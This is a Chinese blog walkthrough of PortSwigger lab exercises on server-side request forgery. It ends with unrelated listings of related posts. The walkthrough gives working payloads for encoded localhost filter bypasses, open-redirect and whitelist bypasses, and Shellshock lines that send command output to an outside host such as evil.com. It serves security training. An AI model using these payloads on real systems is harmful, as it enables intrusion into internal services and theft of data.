PortSwitgge(burp靶场)-SSRF

于 2025-08-14 11:21:28 发布
阅读量541 收藏 3
点赞数 18
CC 4.0 BY-SA版权
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Starshard666/article/details/150386305
Basic SSRF against the local server

根据题目提示,检查商品库存时更改URL为http://localhost/admin,并删除用户carlos

首先使用yakit抓包发现检查库存的URL并将其修改为http://localhost/admin

显示如下图,点击删除用户carlos

发现无法成功删除用户,提示需要以管理员用户登录或以回环地址请求

重新使用检查库存的按钮进行修改删除用户

成功删除

Basic SSRF against another back-end system

根据题目描述在检查库存功能进行扫描192.168.0.x:8080,删除用户carlos

使用yakit进行设置参数查找,发现当x为17时可以成功删除

成功删除用户

Blind SSRF with out-of-band detection

根据题目表述需要在加载商品页面下的Referer参数指定URL,并且需要使用burp的collaborator进行操作,首先在bp中的collaborator下生成一个payload,并且复制到粘贴板中

对加载商品页面进行抓包处理,找到Referer参数,将其修改为刚刚生成的网址

回到collaborator界面下点击立即轮询,看到请求信息

成功解决

SSRF with blacklist-based input filter

开发人员部署了两个弱反SSRF防御,需要绕过并访问http://localhost/admin删除用户carlos

直接修改stockApi发现被拦截了

将localhost修改为127.1并将a进行双URL编码为%2561

将其修改为http://127.1/%2561dmin/delete?username=carlos后点击放行成功删除

SSRF with filter bypass via open redirection vulnerability

提示库存检查器被限制访问本地应用程序,我们需要先找到影响该应用程序的开放重定位。发现右下角的next product按钮有重定位的功能,抓包查看下

将这个位置在stockApi中传入,发现可以成功看到管理员界面

构造payload/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

成功删除用户

Blind SSRF with Shellshock exploitation

根据题目表述我们需要将Referer参数修改为192.168.0.x:8080,其中 x 不确定,需要爆破得知。通过使用shellshock,最终要得到用户名。

首先我们要去了解一下shellshock漏洞(CVE-2014-6271)是怎么回事,通过查阅资料了解到该漏洞的利用方法为在处理某些构造的环境变量时,向环境变量值内的函数定义后添加多余的字符串会触发。使用的环境变量是通过函数名称来调用的,以“(){”开头通过环境变量来定义的。而在处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令。

payload1:env x='() { :;}; echo Shellshock' bash -c "exit"

payload2:() { :; }; echo 1 > /dev/udp/evil.com/53

由于我们需要知道用户名,所以我们构造payload时需要让其显示用户名,即为whoami命令。由于这题是盲注,所以通过查找域名解析服务器进行返回,因此我们构造的payload为() { :; } /usr/bin/nslookup $(whoami).Collaborator服务器,还需要将Referer参数进行爆破处理,具体的如图所示。

爆破的参数直接设置为数值型,1-254即可,进行爆破后再到 Collaborator 中查看,成功找到用户名。

成功解决

SSRF with whitelist-based input filter

根据题目描述需要更改检查库存的URL为http://localhost/admin并删除用户carlos

我们首先点击检查库存按钮后,将URL修改为http://localhost/admin发现直接报错。提示主机必须为stock.weliketoshop.net

根据@绕过我们可以构造为http://localhost@stock.weliketoshop.net

尝试中间用锚点#来分隔(锚点的作用:请求指定资源的子资源,点击指定的链接时候跳转到指定的位置),发现又出现了之前的报错

尝试使用双URL编码进行过滤,发现可以成功过滤

构造payload为http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos,成功解决

Clay-cc
关注
burp靶场-path traversal
qq_33168924的博客
01-15 670
修改filename值:filename=…/etc/passwd。修改GET url:/image?读取:/etc/passwd。
burp靶场--ssrf
qq_33168924的博客
01-17 3077
服务器端请求伪造是一种 Web 安全漏洞,允许攻击者导致服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能能够强制服务器连接到任意外部系统。这可能会泄露敏感数据,例如授权凭据,或者代码执行。
burp靶场--sql通关
2401_89268757的博客
01-12 2033
burp靶场超详细解题过程
burpsuite靶场-SSRF
m0_72199724的博客
08-12 290
本文记录了BurpSuite靶场SSRF漏洞的四个实验过程。01实验通过修改stockApi参数访问admin界面删除用户;02实验指定192.168.0.x:8080来源后删除用户;03实验利用Referer标头和Burp Collaborator完成攻击;04实验通过IPv4缩写和admin编码绕过防护。每个实验都成功完成目标操作,最后返回首页验证结果。这些实验展示了SSRF漏洞的不同利用方式和防护绕过技巧。
burp靶场--CSRF
qq_33168924的博客
01-25 3199
应用程序不校验csrf的有效性,只是对比body中与cookie中csrf的值是否相同,相同就接受请求,由于搜索功能没有csrf保护,并且存在cookie注入,所以可以使用搜索中cookie注入修改cookie的csrf与bodycsrf一致造成csrf攻击。步骤1:登陆两个账户,将账户A的csrfkey与csrf值替换给第二个账户B中使用,用来请求修改邮箱地址,修改成功,但是由于cookie被修改会导致账户退出,并且发现搜索功能存在cookie注入【注入的数据可以修改客户端cookie设置】,所以结合。
burp靶场--XXE注入
qq_33168924的博客
01-16 1765
XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。在某些情况下,攻击者可以利用 XXE 漏洞执行服务器端请求伪造(SSRF) 攻击,升级 XXE 攻击以危害底层服务器或其他后端基础设施。
pikachu靶场----ssrf实现
Tmg3202915143的博客
08-24 655
SSRF(Server-Side Request Forgery:服务器端请求伪造)其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。
burp靶场-API testing
qq_33168924的博客
01-15 1927
Invalid username,这说明了administrator用户名存在,administratorx用户名不存在,可以用来枚举,但是这里的目的不是枚举用户名。构造其他参数进行测试,测试服务是否接受其他参数,如添加【&需要使用url编码】:&x=y,username=administrator%26x=y。测试:username=administrator#【#号使用url编码】,username=administrator%23。从响应结果看出服务大概率是接受多个参数,但是参数x是错误不支持的。
burp靶场--跨域资源共享(CORS)
qq_33168924的博客
01-24 2498
2、完成实验:编制JavaScript来定位本地网络(192.168.0.0/24,端口8080)上的端点,然后使用该端点来识别和创建基于CORS的攻击以删除用户。删除用户carlos。【父域允许子域CORS敏感信息,资源存在xss漏洞,从子域发出xss请求父域敏感信息,并将敏感信息发送到hacker控制的服务器上】1、此网站具有不安全的CORS配置,因为它信任所有内部网络来源。发现内部主机:192.168.0.230:8080。
Burp suite靶场SSRF练习(1)-持续更新中
09-09
本文档是关于使用Burp Suite进行SSRF靶场练习的指南。 通过靶场练习,学习者可以更直观地理解SSRF攻击的工作原理和影响。以下是对靶场练习的知识点详细解析: 1. 靶场SSRF练习概览: - 练习通过一系列的SSRF挑战...
Burp Suite-APIKit插件
03-02
Burp Suite 插件大全
BurpSuite-Xkeys:Burp Suite扩展程序,用于从网页中提取有趣的字符串(密钥,机密,令牌等)
03-20
Xkeys(BurpSuite扩展) 描述 Burp Suite扩展程序,用于从网页中提取有趣的字符串(密钥,机密,令牌等)。并将它们列为信息问题。 类型:无源扫描仪 设置 通过在Burp Suite的“扩展程序”下的“选项”选项卡中提供...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8746
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Matlab中基于蚁群算法的二维路径规划:实现无碰撞智能寻路 · 智能寻路
08-14
内容概要:本文介绍了在Matlab中利用蚁群算法实现的二维路径规划方法。首先简述了路径规划的重要性和应用场景,特别是对于存在大量障碍物的复杂环境。接着详细解释了蚁群算法的基本原理,即模仿蚂蚁觅食过程中信息素传递机制,在二维空间中通过网格化表示可行区域,设置起始点、终止点和障碍物位置。然后阐述了算法的具体流程,包括初始化、信息素初始化、蚂蚁寻路、信息素更新和迭代优化五个主要步骤。最后展示了部分Matlab代码片段,用于演示算法的实现细节及其可操作性。该算法能有效解决机器人导航、无人驾驶等领域的路径规划问题。 适合人群:对路径规划算法感兴趣的研究人员和技术开发者,尤其是那些希望深入了解蚁群算法及其在Matlab环境下应用的人士。 使用场景及目标:适用于需要在二维平面内避开障碍物进行高效路径搜索的应用场合,如机器人自主行走、无人机飞行路线规划、自动化仓库货物搬运等。目标是提供一种可靠的解决方案,确保系统能在复杂环境中安全稳定地运行。 其他说明:文中提供的代码仅为框架示意,实际部署时还需针对特定任务做进一步调整和完善。
基于量化感知训练的 LLM 模型轻量化部署框架 代码
最新发布
08-14
基于量化感知训练的 LLM 模型轻量化 ## 轻量化部署框架框架实现了量化感知训练 (QAT) 和模型轻量化部署的核心功能,支持将大型语言模型压缩后高效部署。框架包含量化感知训练模块、模型压缩工具和轻量级推理引擎。
电力电子领域双向DCDC变换器与锂电池充放电仿真实现及优化
08-14
基于Simulink仿真的直流电压源与双向DCDC变换器组成的锂电池充放电系统。文中阐述了两种工作模式:锂离子电池通过双向DCDC变换器为负载供电,以及电压源为负载供电并同时为锂离子电池充电。这两种模式能够根据电池的荷电状态(SOC)自动或手动切换。文章还深入探讨了双向DCDC变换器内部的Boost和Buck电路的工作机制及其PI控制器参数设置方法,强调了滞环比较、温度补偿、仿真步长选择、冲击电流抑制等关键技术细节,并提供了调试技巧。 适合人群:从事电力电子、电动汽车、储能系统等领域研究和技术开发的专业人士,尤其是对锂电池管理系统感兴趣的工程师。 使用场景及目标:适用于需要理解和优化锂电池充放电系统的场合,如电动车、便携式设备电源管理等。目标是提高系统的稳定性和效率,减少能量损耗。 其他说明:文中提供的仿真模型和调试技巧有助于快速掌握双向DCDC变换器的实际应用,避免常见错误,提升系统性能。
基于遗传算法的微电网经济运行优化:含多种能源设备的MATLAB程序教程 · 能源管理 全面版
08-14
利用遗传算法对含有多种能源设备(如蓄电池、风电、柴油机、光伏、电网购卖电)的微电网进行经济运行优化的方法。文章不仅提供了完整的MATLAB程序代码,还解释了适应度函数的设计、种群初始化策略、交叉与变异操作的具体实现方法。此外,文中特别强调了电网买卖电价差、设备出力边界约束以及惩罚项设置等关键细节,确保优化结果符合实际情况。 适合人群:对微电网优化感兴趣的科研人员、工程技术人员及高校相关专业学生。 使用场景及目标:适用于希望深入了解并掌握遗传算法应用于复杂系统优化的实际案例的学习者;目标是通过具体实例学习如何构建和调优遗传算法模型,解决多目标优化问题。 其他说明:文章最后给出了进一步改进的方向,如引入实时天气预报、使用实测数据拟合成本曲线等,鼓励读者在此基础上继续探索和创新。
公益资料(68页PPT)智慧方案信息物理系统与数字孪生某著名企业.pptx
08-14
公益资料(68页PPT)智慧方案信息物理系统与数字孪生某著名企业.pptx
OBC两级式车载电源的Buck+LLC级联型直流变换器控制模型:双闭环控制优化动态性与鲁棒性 · MatlabSimulink
08-14
电动汽车车载充电器(OBC)采用的两级式直流变换器电路模型及其Matlab/Simulink仿真方法。前级Buck变换器用于稳压调压,后级LLC谐振变换器用于高频隔离。文中提出了一种双闭环控制策略,以外层电压环和内层电流环提高系统的动态响应速度和抗干扰能力。同时提供了具体的PI控制器参数设定以及关键的MATLAB代码片段,展示了如何优化LLC谐振参数以确保零电压开关(ZVS)效果,并讨论了针对不同工况下的调整技巧。 适合人群:从事电力电子、新能源汽车领域的工程师和技术研究人员。 使用场景及目标:适用于需要深入了解OBC两级式车载电源设计原理的研究人员,特别是对Buck+LLC级联结构感兴趣的技术人员。目标是掌握该结构的工作机制、控制策略及仿真实现方法。 其他说明:文章强调了实际应用中的注意事项,如谐振参数的选择、前馈补偿的应用以及环路调试的经验分享。对于希望将理论应用于实践的人来说非常有价值。
burpsuite与ssrf
09-13
Burp Suite是一款常用的Web应用程序渗透测试工具。它提供了一系列的功能和插件,旨在帮助安全研究人员发现和利用应用程序中的漏洞。其中一个常见的漏洞是SSRF(Server-Side Request Forgery)漏洞,它允许攻击者发送恶意请求,使应用程序内部可以访问的资源。 SSRF-King是专为Burp Suite开发的一个插件,它可以自动化SSRF检测。通过使用SSRF-King,安全研究人员可以更方便地进行SSRF漏洞的测试和发现。 在使用Burp Suite进行SSRF漏洞测试时,可以使用如引用中所示的HTTP请求格式,并指定目标主机和路径。此外,为了模拟真实的攻击场景,我们可以使用Burp Collaborator来创建一个协作服务器,以便与目标应用程序建立连接并收集有关潜在SSRF漏洞的信息。如引用所示,可以通过使用Burp Collaborator客户端创建一个域名,然后将其替换为请求中的BURP-COLLABORATOR-SUBDOMAIN,以便进行漏洞测试。 总结来说,Burp Suite是一款功能强大的Web应用程序渗透测试工具,而SSRF-King是其上的一个插件,专门用于帮助安全研究人员自动化进行SSRF漏洞检测。通过使用Burp Suite和SSRF-King插件,研究人员可以更有效地测试和发现SSRF漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值